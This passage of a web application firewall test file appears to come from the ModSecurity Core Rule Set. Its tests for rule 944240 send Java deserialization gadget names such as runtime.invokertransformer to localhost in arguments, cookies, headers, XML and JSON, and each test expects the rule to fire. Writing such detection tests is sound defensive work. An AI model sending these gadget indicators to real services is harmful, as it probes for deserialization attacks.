Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-39 + desc: "XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-40 + desc: "Nested XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 
Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-41 + desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-42 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-43 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-44 + desc: "Argument test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-45 + desc: "Argument name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-46 + desc: "Cookie test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-47 + desc: "Cookie name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-48 + desc: "Request header test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-49 + desc: "XML attribute value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-50 + desc: "XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-51 + desc: "Nested XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-52 + desc: "Content-Type text/plain includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-53 + desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-54 + desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-55 + desc: "Argument test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-56 + desc: "Argument name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-57 + desc: "Cookie test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-58 + desc: "Cookie name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-59 + desc: "Request header test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-60 + desc: "XML attribute value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-61 + desc: "XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-62 + desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-63 + desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-64 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-65 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-66 + desc: "Argument test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-67 + desc: "Argument name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: 
"runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-68 + desc: "Cookie test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-69 + desc: "Cookie name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-70 + desc: "Request header test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: 
runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-71 + desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-72 + desc: "XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-73 + desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-74 + desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-75 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: 
"{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-79 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + 
- test_title: 944240-80 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - 
stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "runtime.whileclosure"
+ output:
+ log_contains: "id \"944240\""
+ - test_title: 944240-84
+ desc: "Nested XML element value includes keyword runtime.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
